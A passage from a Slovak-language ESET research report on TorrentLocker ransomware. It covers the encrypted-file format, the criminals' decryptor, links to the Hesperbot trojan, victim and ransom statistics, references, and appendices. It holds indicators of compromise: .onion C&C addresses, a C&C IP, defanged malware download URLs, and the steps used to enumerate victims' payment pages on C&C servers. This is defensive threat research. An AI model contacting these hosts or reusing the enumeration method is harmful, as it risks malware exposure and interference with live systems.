Exfiltrácia kľúča Predtým, ako sa súbory zašifrujú, kľúč sa zašifruje verejným, 2048-bitovým verejným kľúčom RSA, ktorý je súčasťou TorrentLockera, ktorý sa potom odošle do C&C servera s typom požiadavky nastaveným na 1. V príkladoch malvéru je kľúč zakódovaný DER vo formáte PKCS#1 RSAPublicKey. PKCS#1 OAEP sa používa ako výplň. Formát zašifrovaného súboru Ako nahlásil NIXU [9], TorrentLocker zašifruje iba prvé 2 MB súboru. Toto je pravdepodobne voľba autora malvéru z dôvodov výkonu. Zašifrovanie prvých 2 MB vo väčšine prípadov aj tak spôsobí, že súbor je nepoužiteľný. Na konci zašifrovaného súboru sa pridávajú tri položky: Tabuľka č. 5. Štruktúra pridaná za obsah zašifrovaného súboru. Veľkosť 4-bajtové číslo 4-bajtové číslo n bajtov Obsah Kontrolný súčet Adler-32 kľúča AES-256. Veľkosť kľúča zašifrovaného RSA (pravdepodobne 256) Kľúč AES-256 zašifrovaný verejným kľúčom RSA TorrentLockera Kontrolný súčet Adler-32 bol pravdepodobne pridaný, aby umožnil určité overenie kľúča AES a potvrdenie, že súbor bol skutočne zašifrovaný TorrentLockerom. Tento spôsob ponechania kľúča AES v zašifrovanom súbore umožňuje prevádzkovateľom TorrentLockera, príp. komukoľvek so súkromným kľúčom RSA, dešifrovať obsah súboru. Poskytuje spôsob na získanie kľúča AES dokonca aj v prípade zlyhania C&C servera. Tento súkromný kľúč je však v rukách páchateľov. Získanie tohto súkromného kľúča by umožnilo vytvorenie generického dešifrovacieho softvéru. 19

6. ANALÝZA DEŠIFROVACIEHO SOFTVÉRU Analytikom spoločnosti ESET sa podarilo analyzovať dešifrovací softvér predávaný gangom prostredníctvom prístupu na platobné stránky obetí, ktoré zaplatili za softvér (pozrite si časť Metodológia). Tento dešifrovací softvér nie je vôbec mätúci. Veľa kódu zdieľa so samotným ransomvérom. Zároveň pre potreby šifrovania používa LibTomCrypt. Obrázok č. 12: Snímka obrazovky dešifrovacieho softvéru. V rámci jednej kampane je kód vo vnútri dešifrovacieho softvéru rovnaký pre všetkých. Ako je možné vidieť na nasledujúcej snímke obrazovky, jediným rozdielom je 32-bajtový kľúč AES-256 použitý na dešifrovanie dokumentov. Obrázok č. 13. Kľúče AES nie sú jediným rozdielom v dešifrovacom softvéri, ktorý zločinci šíria. Keďže kľúč AES je jedinečný pre každú infekciu, nie je možné použiť rovnakú kópiu dešifrovacieho softvéru pre dva rozdielne infikované počítače. 20

7. PODOBNOSŤ S BANKOVÝM TRÓJSKYM KOŇOM HESPERBOT Hesperbot objavili analytici ESETu v roku 2013. Je to bankový trójsky kôň schopný injektovania javascriptu a HTML do webových stránok. Jeho hlavným cieľom je krádež bankových údajov. Obsahuje tiež komponent pre Android na zachytávanie jednorazových hesiel (OTP), ktoré používajú určité banky. Dokument o Hesperbote je k dispozícii online na našom blogu welivesecurity.com. Počas nášho vyšetrovania TorrentLockera sme zistili, že tieto dve hrozby sú veľmi podobné. V skutočnosti to vyzerá tak, že autorom a prevádzkovateľom je jedna a tá istá skupina. Okrem toho, že cieľom sú rovnaké krajiny (hlavne Turecko, Česká republika a Austrália), sú tu aj iné stopy, ktoré naznačujú, že oba spolu súvisia. 7.1 Podobnosť stránok určených na šírenie malvéru Webové stránky používané na šírenie Hesperbotu na začiatku roku 2014 boli podobné tým, ktoré na šírenie používa TorrentLocker. V marci toho roku, MRG Effitas [20] uverejnil blogový príspevok o stránke na stiahnutie s obrázkom CAPTCHA, používanej na šírenie Hesperbotu. Je veľmi nezvyčajné používať na šírenie malvéru stránku s obrázkom CAPTCHA. URL adresy tiež vykazujú určitý vzorec, v niektorých prípadoch končiaci na.php?id=[digits]. Distribuuje Hesperbot Distribuuje TorrentLocker Obrázok č. 14: Porovnanie URL adries stránok. V oboch prípadoch bol stiahnutý.zip súbor obsahujúci škodlivý spustiteľný súbor. Názov.zip súboru má rovnaký vzor: [word]_[digits].zip. Páchatelia tiež napodobňujú TTNet, obľúbenú telekomunikačnú stránku v oboch [19] prípadoch [Príloha A]. 7.2 Opätovné použitie C&C servera Vo svojom blogovom príspevku [20], MRG Effitas tiež zverejnil adresu C&C servera pre Hesperbot, updatesecurehost1.ru, ktorá je 46.149.111.178. Čo je zaujímavé, táto IP adresa bola tiež použitá ako C&C server pre TorrentLocker v septembri 2014. Príklady obsahujú URL adresu s doménou nigerianpride.net, ktorou v tom čase bola 46.149.111.178. 21

7.3 Cesta k súboru PDB V oboch skupinách malvéru, prvotné verzie ukazujú cestu k súboru PDB (Program Database, používa sa pre informácie o odstraňovaní porúch) po jeho rozbalení. Cestu k súboru PDB pre Hesperbot našiel Peter Kleissner a zverejnil ju na Twitter v novembri 2013. Cesta k PDB súboru pre modul procblock pre Hesperbot bola nasledujúca: X:\hesperus\solution\v3_pdf_err\output\mods\Release\procblock_mod_x86.pdb V auguste 2014 analytici ESETu skúmali vzorku, ktorá vykazovala veľmi podobnú cestu k súboru PDB. Táto vzorka obsahovala nasledujúcu cestu pre modul jadra TorrentLockera: X:\racketeer\solutions\new\output\Release\bin\rack-core.pdb Iné vzorky tiež vykazovali iný binárny kód nazvaný rack-dropper: X:\racketeer\solutions\new\output\Release\rack-dropper.pdb Prítomnosť toho, čo vyzerá ako projekty Visual Studio v koreni disku X, nie je ničím bežným. I keď je možné, že dvaja rozdielni autori malvéru použili rovnakú cestu, tieto zistenia predpokladajú, že obidva malvéry boli zostavené na rovnakom stroji. 22

8. ŠTATISTIKA Keď sme zistili, ako sa generujú používateľské kódy (pozrite si Generovanie identifikačného kódu obete), analytici ESETu dokázali vytiahnuť informácie o obetiach z C&C serverov TorrentLockera. 8.1 Metodológia Nižšie sú uvedené kroky, ktoré sme podnikli, aby sme získali platobné stránky z C&C serverov: 1. Poslanie požiadavky Získať stránku na výkupné do C&C servera spolu s menom náhodného počítača 1. Rozbalenie používateľského kódu zo stránky 1. Rozbalenie identifikácie používateľa z používateľského kódu 1. Žiadosť o všetky platobné stránky s identifikáciou používateľa nižšou ako tá, ktorú sme dostali Tento experiment prebehol 24. novembra 2014. Rozhodli sme sa použiť všetky domény.onion, ktoré sme našli na stránkach s výkupným. Spoločné použitie domény.onion a používateľského kódu je vlastne spôsob, akým prevádzkovateľ TorrentLockera dokáže jedinečne identifikovať svoje obete, takže to bol najlepší spôsob na získanie čo najlepšieho pokrytia. Tu je zoznam C&C serverov: Tabuľka č. 6. Zoznam serverov C&C kontaktovaných v rámci experimentu. Doména.onion 4ptyziqllh5iyhx4.onion tisoyhcp2y52ioyk.onion nne4b5ujqqedvrkh.onion Dátum prvého videnia 20. november 2014 12. november 2014 25. september 2014 Získaný používateľský kód Používateľský kód dekódovaný Base 36 3fcyy0 207197928 2071 12m8so9 2335076649 23350 bgaj2r 692493075 6924 erhitnwfvpgajfbu.onion 29. august 2014 Rovnaký výsledok ako nne4b5ujqqedvrkh.onion a5xpevkpcmfmnaew.onion 3v6e2oe5y5ruimpe.onion 18. november 2014 17. november 2014 23fld9 126698733 1266 mqxfz9 1375486245 13754 udm744mfh5wbwxye.onion 6. august 2014 Nefunkčná iet7v4dciocgxhdv.onion 31. júl 2014 Nefunkčná Identifikácia používateľa 8.2 Výsledky Analytici ESETu si vyžiadali celkom 47 365 platobných stránok z 5 rozdielnych C&C serverov. Z tohto celkového počtu, 39 670 stránok boli platné používateľské kódy vygenerované úspešným infikovaním s platobnými informáciami alebo prepojením na stiahnutie dešifrovacieho softvéru v prípade, že obeť zaplatila výkupné. Ostatné používateľské kódy mohli z databázy vymazať prevádzkovatelia, pretože sú príliš staré, alebo z dôvodu, že neboli výsledkom skutočného infikovania (napr. používateľské kódy vytvorené analytikom malvéru). Z celkového počtu 39 670 obetí, 570 zaplatilo výkupné a dostalo odkaz na dešifrovací softvér. Inými slovami, 1,44 % infikovaných používateľov, ktorých sme identifikovali, zaplatilo kybernetickým 23

zločincom výkupné. 20 stránok tiež ukazuje, že bitcoiny boli odoslané ale prístup na dešifrovací softvér nebol poskytnutý z dôvodu, že nebola uhradená plná suma. Zaplatené Čiastočne zaplatené Nezaplatené Obrázok č. 15: Pomer obetí, ktoré kybernetickým zločincom zaplatili za dešifrovací softvér. Platobná stránka sa prispôsobuje krajine obeti. Jazyk, mena a tiež prepojenia na trh s bitcoinmi sú rozdielne. Boli zistené vzory na celkovo 13 rozdielnych krajín. V niektorých krajinách boli kampane na šírenie veľmi úspešné a v niektorých krajinách bolo zaznamenaných iba niekoľko infikovaní. Španielsko Rakúsko Neznáme Francúzsko Holandsko Turecko Nemecko Nový Zéland Veľká Británia Kanada Írsko Česká republika Austrália Taliansko Obrázok č. 16: Počet infekcií podľa krajín. 24

1 777 neznámych stránok je v anglickom jazyku a neobsahujú žiadne informácie špecifické pre určitú krajinu, týkajúce sa nákupu bitcoinov. Vyzerá to tak, že generická stránka, ktorá sa používa na šírenie, sa nezameriava cielene na určitú krajinu. Platobná stránka zobrazuje obeti dve rozdielne ceny: môžu zaplatiť buď polovičnú sumu v prípade, že je výkupné uhradené do určitého času, alebo plnú sumu, ak sa obeť rozhodne zaplatiť po uvedenom termíne. Doba platnosti tejto zľavy sa pohybuje medzi 2-4 dňami a pri každej kampani je iná. Plná suma výkupného, požadovaná na odšifrovanie súborov, sa pohybuje medzi 2,0264 BTC a 4,0810 BTC Suma sa zrejme mení v závislosti na hodnote bitcoinov v momente spúšťania kampane, príp. v závislosti na iných faktoroch. Zároveň sme si všimli, že kampaň, v rámci ktorej sa žiada výkupné, nie je vždy rovnaká. Tu napríklad uvádzame 10 po sebe idúcich infikovaní: Tabuľka č. 7. Podrobné údaje desiatich, po sebe idúcich platobných stránok, z jedného C&C servera. ID Krajina Výkupné (BTC) Výkupné (peniaze) i Turecko 2,8589 BTC 2599 TRY i+1 Turecko 1,9789 BTC 1799 TRY i+2 Turecko 2,4189 BTC 2199 TRY i+3 Turecko 2,8589 BTC 2599 TRY i+4 Turecko 1,9789 BTC 1799 TRY i+5 Turecko 2,4189 BTC 2199 TRY i+6 Turecko 2,8589 BTC 2599 TRY i+7 Turecko 1,9789 BTC 1799 TRY i+8 Turecko 2,4189 BTC 2199 TRY i+9 Turecko 2,8589 BTC 2599 TRY Je možné, že prevádzkovatelia TorrentLockera sa pokúšajú zistiť tú správnu sumu, ktorú si od obetí požadovať, aby maximalizovali svoj príjem. Pre všetkých 39 100 obetí, ktoré výkupné neuhradili, je priemerná požadovaná suma 1,334 BTC v prípade zaplatenia v rámci zľavy, potom je cena 2,688 BTC. Je ťažké uviesť, kto zaplatil plnú sumu a kto zľavnenú (polovičnú) sumu. Z tohto dôvodu sme sa rozhodli použiť rozsah, aby sme dokázali kvantifikovať zisk páchateľov. Celková suma v bitcoinoch sa pohybuje v rozmedzí 760,38 1520,76 BTC. Pri hodnote bitcoinu dňa 29. novembra 2014 (1 BTC = 384,94 dolára) to znamená, že svoje obete pripravili o sumu v rozmedzí 292 700 585 401 dolárov. Platobné stránky nedávnych infikovaní obsahovali dobu, ktorá zostávala do vypršania zľavy, a zvýšenie ceny. Zistili sme, že bolo 2766 stránok, kde zostávajúci čas bol vyšší ako nula. Maximálny zostávajúci čas zo stránok bol takmer presne štyri dni. Bolo to pravdepodobne veľmi nedávne infikovanie a myslíme si, že je bezpečné predpokladať, že štyri dni je čas poskytnutý na zaplatenie polovičnej ceny. Na záver je možné uviesť, že týchto 2766 obetí bolo infikovaných medzi 20. -24. novembrom 2014, čo počas tohto obdobia predstavuje 691,5 infikovaní denne. TorrentLocker nahlasuje C&C serveru počet súborov, ktoré zašifroval. Táto informácia nám umožnila určiť celkový počet zašifrovaných súborov, ktorý ku 24. novembru 2014 predstavuje číslo až 284 716 813. 25

9. ZÁVER Gang prevádzkujúci TorrentLocker šíri tento ransomvér minimálne od februára 2014. Tým, že obetiam zabránili prístup k ich dokumentom, získali neuveriteľné množstvo bitcoinov. Doteraz to vyzerá tak, že príslušné orgány nedokážu toto podnikanie zastaviť. Presunom z AES v režime CTR na AES v režime CBC podstatne sťažili dešifrovanie bez AES kľúča. Získanie súkromného kľúča RSA od prevádzkovateľov by predstavovalo získanie schopnosti rozbaliť AES z akéhokoľvek zašifrovaného súboru. Pomocou tejto informácie by bolo možné vytvoriť generický nástroj na dešifrovanie. Jedným spôsobom, ako vyliečiť Torrent Locker, je mať offline zálohu. TottentLocker nedokáže upravovať obsah súborov, ktoré nie sú pripojené k infikovanému zariadeniu. Je však potrebné uvedomiť si, že ak je vaša záloha permanentne pripojená k počítaču, alebo na sieťovom disku, ktorý je kedykoľvek pripojiteľný, malvér taktiež zakóduje jeho obsah. Stále je treba odpovedať na množstvo otázok týkajúcich sa toho, ako gang funguje v pozadí: Predáva niekto balíček Racketeer iným, ktorí prevádzkujú botnet, alebo oni sami sú autormi a sami ho aj prevádzkujú? Jedná sa o vedľajší projekt spájaný s autormi Hesperbotu? Získavajú peniaze obidva naraz alebo sa presunuli iba na TorrentLocker? Prináša tento šírený ransomvér viac zisku ako bankový trójsky kôň? 26

10. POĎAKOVANIE Ďakujeme Thomasovi Dupuyovi za jeho pomoc pri analýze TorrentLockera. 11. ODKAZY Blogové príspevky týkajúce sa TorrentLockera v chronologickom poradí [1] 2014-02-20, Osman Pamuk, Emir Üner and Alican Akyo (TÜBİTAK BİLGEM), Kripto kilit yöntemini kullanan şantajcı zararlı yazılım, https://www.bilgiguvenligi.gov.tr/zararliyazilimlar/kripto-kilit-yontemini-kullanan-santajci-zararli-yazilim.html [2] 2014-02-27, rebus, Sifreli Ransomware, http://rebsnippets.blogspot.com/2014/02/sifreli-ransomware.html [3] 2014-03-25, samohtc, CAPTCHA protected malware downloader, https://community. emc.com/community/connect/rsaxchange/netwitness/blog/2014/03/25/captcha-protectedmalware-downloader [4] 2014-05-30, Fred Touchette (App River), New CryptoLocker Has a Walkabout, http://blog.appriver.com/2014/05/new-cryptolocker-has-a-walkabout [5] 2014-06-02, Joseph Graziano (Symantec), Energy Bill Spam Campaign Serves Up New Crypto Malware, http://www.symantec.com/connect/blogs/energy-bill-spam-campaignserves-new-crypto-malware [6] 2014-06-03, Michael Jenkin, Cryptolocker (Again, new and improved?), http://blogs.msmvps.com/mickyj/blog/2014/06/03/cryptolocker-again-new-and-improved [7] 2014-06-10, Ivo Ivanov (Vínsula), Analysis of CryptoLocker Racketeer spread through fake Energy Australia email bills, http://vinsula.com/2014/06/10/analysis-of-cryptolocker-racketeer [8] 2014-08-15, Richard Hummel (isight Partners), Analysis of TorrentLocker A New Strain of Ransomware Using Components of CryptoLocker and CryptoWall, http://www. isightpartners.com/2014/08/analysis-torrentlocker-new-strain-malware-using-componentscryptolocker-cryptowall [9] 2014-09-09, Taneli Kaivola, Patrik Nisén and Antti Nuopponen (Nixu), TorrentLocker Unlocked, http://digital-forensics.sans.org/blog/2014/09/09/torrentlocker-unlocked [10] 2014-09-17, Richard Hummel (isight Partners), TorrentLocker New Variant with New Encryption Observed in the Wild, http://www.isightpartners.com/2014/09/torrentlocker-new-variant-observed-wild [11] 2014-09-27, Chris Mannon (Zscaler), Crypto-Ransomware Running Rampant, http://research.zscaler.com/2014/10/crypto-ransomware-running-rampant.html [12] 2014-10-20, Paolo Dal Checco and Giuseppe Dezzani (Digital Forensics Bureau), TorrentLocker Enti Italiani sotto riscatto, http://www.difob.it/torrentlocker-cryptolocker-documenti-criptati/ [13] 2014-10-21, Joost Bijl (Fox-IT), Update on the Torrentlocker ransomware, http://blog.fox-it.com/2014/10/21/update-on-the-torrentlocker-ransomware/ [14] 2014-10-30, MailGuard, MailGuard Breaking IT News: Fake NSW Office of State Revenue Scam, http://www.mailguard.com.au/blog/mailguard-breaking-it-news-fake-nsw-office-ofstate-revenue-scam/ [15] 2014-11-03, Paul Ducklin, GATSO! Speed camera phish leads to CryptoLocker ransomware clone, http://nakedsecurity.sophos.com/2014/11/03/gatso-speed-camera-phish-leads-tocryptolocker-ransomware-clone [16] 2014-11-11, Patrick, Crytolocker Ransomware Campaign - Oct/Nov 2014, http://protectyournet.blogspot.com/2014/11/crytolocker-ransomware-campaign-octnov.html 27

[17] 2014-11-14, Osman Pamuk, Alican Akyol (TÜBİTAK BİLGEM), Güncel CryptoLocker Saldırısına Dikkat, https://www.bilgiguvenligi.gov.tr/zararli-yazilimlar/guncel-cryptolocker-saldirisinadikkat.html [18] 2014-11-18, Zemana, Dosyalarınızı şifreleyen telefon faturasına dikkat edin!, http://blog.zemana.com/2014/11/dosyalarnz-sifreleyen-telefon-faturasna.html Blogové príspevky týkajúce sa Hesperbotu [19] 2013-07-26, Emir Üner, Alican Akyol, Onur Samet Özer (TÜBİTAK BİLGEM), Fatura Zararlı Yazılım (DefRef) Analizi, http://www.bilgiguvenligi.gov.tr/zararli-yazilimlar/fatura-zararliyazilim-defref-analizi.html [20] 2014-03-27, Zoltan Balazs (MRG Effitas), Captcha protected malware, https://blog.mrg-effitas.com/captcha-protected-malware/ CryptoLocker [21] 2013-12-18, Keith Jarvis (Dell SecureWorks), CryptoLocker Ransomware, http://www.secureworks.com/cyber-threat-intelligence/threats/cryptolocker-ransomware/ [22] 2014-07-08, Meaghan Molloy (FireEye), Operation Tovar: The Latest Attempt to Eliminate Key Botnets, https://www.fireeye.com/blog/threat-research/2014/07/operation-tovar-thelatest-attempt-to-eliminate-key-botnets.html 28

12.PRÍLOHY Príloha A: Snímky stránok s CAPTCHA, z ktorých sa sťahoval malvér Obrázok č. 17: DHL - Rakúsko a Nemecko. Obrázok č. 18: Office of State Revenue Austrália. 29

Obrázok č. 19: Auspost Austrália Obrázok č. 20: Česká pošta Česká republika. 30

Obrázok č. 21: TTNet Turecko. Obrázok č. 22: Royal Mail Veľká Británia. 31

Obrázok č. 23: SDA Taliansko. 32

Príloha B: Zoznam známych domén, na ktorých sa nachádza stránka, z ktorej sa stiahne malvér Zoznamy sú obmedzené na URL adresy pozorované v novembri 2014. Zátvorky ({}) označujú, že na danej stránke sa nachádzalo viacero názvov súborov. Možné názvy súborov sú oddelené čiarkami v zátvorkách. Stránky s odkazom na stiahnutie obsahujúce CAPTCHA hxxp://aupostal24.org hxxp://correos-online.org hxxp://cs-posta24.info hxxp://csposta24.org hxxp://efatura.ttnet-fatura.biz/ hxxp://efatura.ttnet-fatura.info/ hxxp://efatura.ttnetbilglendirme.com/ hxxp://mysda24.biz hxxp://mysda24.com Priame prepojenia na súbor.zip hxxp://0160d4a.netsolhost.com/responder.zip hxxp://122.155.13.156/{condition,details,payment,price}.zip hxxp://abaxsoftware.org/{condition,details,payment,pricelist}.zip hxxp://accessautoclass.com/processing.zip hxxp://ad-ep.com/{mensaje,perfil,responder}.zip hxxp://administ.hn02.wiroos.com/saldo.zip hxxp://agrofert.com.ar/invoice.zip hxxp://ameridev.com/informe.zip hxxp://animale.com/condition.zip hxxp://attorneyjacksonms.com/informe.zip hxxp://aurahearingaid.com/{account,payment}.zip hxxp://bariawilliamson.com/{informe,mensaje,perfil,responder}.zip hxxp://bbbjewelry.net/mensaje.zip hxxp://bedazzlememore.com/{informe,mensaje,responder}.zip hxxp://beepbike44.fr/{answer,contract,documentation,invoice,message}.zip hxxp://bharatvalley.com/account.zip hxxp://bigappleinfotech.com/processing.zip hxxp://canonistasargentina.com/info.zip hxxp://capitolpestcontrol.com/{mensaje,perfil}.zip hxxp://casadahospedagem.com.br/invoice.zip hxxp://centralapplianceservice.com/informe.zip hxxp://chapasyherrajesdelbajio.com.mx/invoice.zip hxxp://chli.ca/{answer,message}.zip hxxp://consultasas.com/perfil.zip hxxp://coolwatercatering.com/{mensaje,perfil}.zip hxxp://crm.opusestates.in/{account,invoice,payment}.zip hxxp://cybercountrysystems.com/{informe,perfil,responder}.zip hxxp://desingforbiosafety.com/processing.zip 33

hxxp://dipneo.com.ar/invoice.zip hxxp://docs.majesticcinemas.com.au/invoice.zip hxxp://doctoresarceo.com.mx/payment.zip hxxp://electriargo.mx/{info,processing}.zip hxxp://enginemanagementsystem.com/details.zip hxxp://englishdemo.emonkey.no/processing.zip hxxp://ever-move.be/{account,payment,transazione}.zip hxxp://fastweb011.net/{mensaje,responder}.zip hxxp://foresightinfra.com/account.zip hxxp://fromagerie-de-malataverne.fr/documentation.zip hxxp://golftoknow.com/{answer,contract,documentation,message}.zip hxxp://graniteunlimitedinc.com/processing.zip hxxp://gt1004.com/{documentation,invoice,message}.zip hxxp://helenannobil.com/fattura.zip hxxp://hellovizag.com/{contract,message}.zip hxxp://hostvip.com.br/answer.zip hxxp://htcladakh.com/info.zip hxxp://hukum.ub.ac.id/{info,processing}.zip hxxp://inegolbakkallarodasi.com/invoice.zip hxxp://ingentec.co.th/answer.zip hxxp://iplbiotech.com/{details,payment,pricelist}.zip hxxp://jjskin.kr/{condition,details,pricelist}.zip hxxp://jmlignon.o2switch.net/processing.zip hxxp://kafekaapeh.com/info.zip hxxp://kvak.cz/{info,processing}.zip hxxp://la.srv.br/{answer,message}.zip hxxp://laamigo.com/payment.zip hxxp://laanimatera.com.ar/{payment,price,pricelist}.zip hxxp://laflammedd.com/{informe,mensaje}.zip hxxp://lahatte.com/responder.zip hxxp://laislaconsultora.com.ar/info.zip hxxp://lencuthbert.com/responder.zip hxxp://littlebluechoo.com/{mensaje,perfil}.zip hxxp://mamchandschool.com/{account,invoice}.zip hxxp://mamhtroso.com/info.zip hxxp://merliasfalti.it/{info,invoice}.zip hxxp://messancy.com/{informe,perfil,responder}.zip hxxp://metrofinish.com/{account,info,invoice}.zip hxxp://midamdental.com/{payment,price,pricelist}.zip hxxp://msdisabilities.com/responder.zip hxxp://msrealestate.com/perfil.zip hxxp://mylowprice.net/contract.zip hxxp://mytraveladvisor.co.uk/{condition,details,payment,price}.zip hxxp://new-line.co.kr/{condition,details,payment,price}.zip hxxp://nicolesantivip.com/pricelist.zip hxxp://ninacucina.com/responder.zip 34

hxxp://odontoportes.com.br/{answer,contract}.zip hxxp://oelsmeier.homepage.t-online.de/informe.zip hxxp://orthoiris.com/perfil.zip hxxp://perthanddistrictpipeband.co.uk/{condition,price,pricelist}.zip hxxp://petitrenaud.net/payment.zip hxxp://placagesdebois.com/responder.zip hxxp://pousadapraiagrande.com/invoice.zip hxxp://priceskincareclinic.com/responder.zip hxxp://protecnicsrl.com/{answer,contract,documentation}.zip hxxp://rebatsystems.com/{informe,mensaje,responder}.zip hxxp://regallaboratories.com/{invoice,payment}.zip hxxp://regoshin.com/info.zip hxxp://rehabilitacionescampillo.com/contract.zip hxxp://robinsoncarneiro.com/{documentation,message}.zip hxxp://royalhandicraftindia.com/{contract,invoice}.zip hxxp://sereinesolutions.fr/{contract,message}.zip hxxp://shadesofaustralia.net.au/processing.zip hxxp://slass.org/{details,payment}.zip hxxp://solarseg.com.br/{answer,documentation}.zip hxxp://solutechnic.com/condition.zip hxxp://spellfresh.com.ar/pricelist.zip hxxp://ssuetcep.com/{mensaje,responder}.zip hxxp://ssumcba.org/{informe,perfil,responder}.zip hxxp://starnaweb.com.br/{details,price}.zip hxxp://stjosephfarmington.com/informe.zip hxxp://stoffels.be/condition.zip hxxp://talent-decoration.net/perfil.zip hxxp://tibo.andreka.be/mensaje.zip hxxp://tluaner.com/{answer,contract,invoice}.zip hxxp://totalitsolution.co/answer.zip hxxp://truehearted.co.uk/perfil.zip hxxp://turbul-montessori.fr/pricelist.zip hxxp://valledelzamudia.es/price.zip hxxp://valorpro.net/{account,invoice,payment}.zip hxxp://vault-dwellers.com/{informe,mensaje}.zip hxxp://vertvonlinebr.net/{payment,price}.zip hxxp://w3solutions.co.in/{condition,details}.zip hxxp://webtosta.com/{mensaje,perfil,responder}.zip hxxp://whitedayandblacknight.com/{details,payment,price}.zip hxxp://wulcon.com/{documentation,invoice}.zip hxxp://www.amdexsolutions.co.uk/{info,invoice}.zip hxxp://www.artnportrait.com/{answer,contract,documentation,invoice}.zip hxxp://www.avventuroso.eu/{contract,documentation,invoice,message}.zip hxxp://www.bscmilano.com/{contract,invoice}.zip hxxp://www.corederoma.net/invoice.zip 35